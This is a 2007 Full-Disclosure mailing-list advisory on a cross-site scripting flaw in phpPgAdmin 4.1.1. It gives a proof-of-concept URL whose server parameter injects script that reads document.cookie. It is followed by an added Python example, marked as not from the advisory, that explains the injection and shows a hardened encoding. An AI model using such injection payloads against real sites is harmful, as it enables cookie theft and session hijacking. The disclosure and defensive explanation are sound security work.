List: full-disclosure
Subject: [Full-disclosure] phpPgAdmin XSS Vulnerability
From: "Michal Majchrowicz" <m.majchrowicz () gmail ! com>
Date: 2007-05-22 23:28:59
Message-ID: 3d3168e50705221628p1fb64076u6debf8a68c5901fc () mail ! gmail ! com
There is a JavaScript code injection in phpPgAdmin, which fails to correctly
sanitize user-supplied data. As a result, a very simple XSS is possible. This
was tested on phpPgAdmin 4.1.1 as a not-logged-in user.
PoC:
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//
Regards Michal Majchrowicz.
Hack.pl
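The PoC above works because the `server` query parameter ends up inside a quoted JavaScript string literal, so a value containing `');` closes the literal and what follows runs as code. The following is an added example, not code from the advisory or from phpPgAdmin: it parses the advisory's PoC URL, renders the parameter into a hypothetical inline script in the unsafe concatenation style (assumed for illustration; the real sqledit.php source is not on this page), renders it again with JSON encoding for the JavaScript string context, and uses a small literal scanner to confirm that only the hardened rendering keeps the value inside one string literal. The hostname `test.com` is the advisory's own placeholder.

```python
import json
from urllib.parse import urlsplit, unquote

# The advisory's PoC URL, embedded here as constructed sample input.
POC_URL = ("https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');"
           "alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//")


def server_param(url: str) -> str:
    """Return the URL-decoded 'server' query parameter as the application would see it."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "server":
            return unquote(value)
    return ""


def render_vulnerable(server: str) -> str:
    """Hypothetical unsafe pattern: the raw parameter is concatenated into a
    single-quoted JavaScript string literal inside a <script> element."""
    return "<script>var server = '" + server + "';</script>"


def render_hardened(server: str) -> str:
    """Encode for the JavaScript string context: json.dumps escapes quotes,
    backslashes and control characters, and '</' is neutralised so the value
    can never close the enclosing <script> element."""
    encoded = json.dumps(server).replace("</", "<\\/")
    return "<script>var server = " + encoded + ";</script>"


def literal_intact(page: str) -> bool:
    """Check that the rendered script consists of exactly one string literal:
    the first unescaped closing quote must be the last character before ';'."""
    prefix, suffix = "<script>var server = ", ";</script>"
    if not (page.startswith(prefix) and page.endswith(suffix)):
        return False
    lit = page[len(prefix):-len(suffix)]
    if len(lit) < 2 or lit[0] not in "'\"":
        return False
    quote = lit[0]
    i = 1
    while i < len(lit):
        if lit[i] == "\\":
            i += 2          # skip the escaped character
            continue
        if lit[i] == quote:
            return i == len(lit) - 1   # closing quote must end the literal
        i += 1
    return False            # literal never closed


if __name__ == "__main__":
    value = server_param(POC_URL)
    print("decoded server parameter:", value)
    print("vulnerable rendering intact:", literal_intact(render_vulnerable(value)))
    print("hardened rendering intact:  ", literal_intact(render_hardened(value)))
```

JSON encoding is the right primitive only for the JavaScript string context; a value that is also reflected into an HTML attribute or element body needs HTML entity encoding (`htmlspecialchars` in PHP) for that context instead, and the two must not be mixed up.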
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/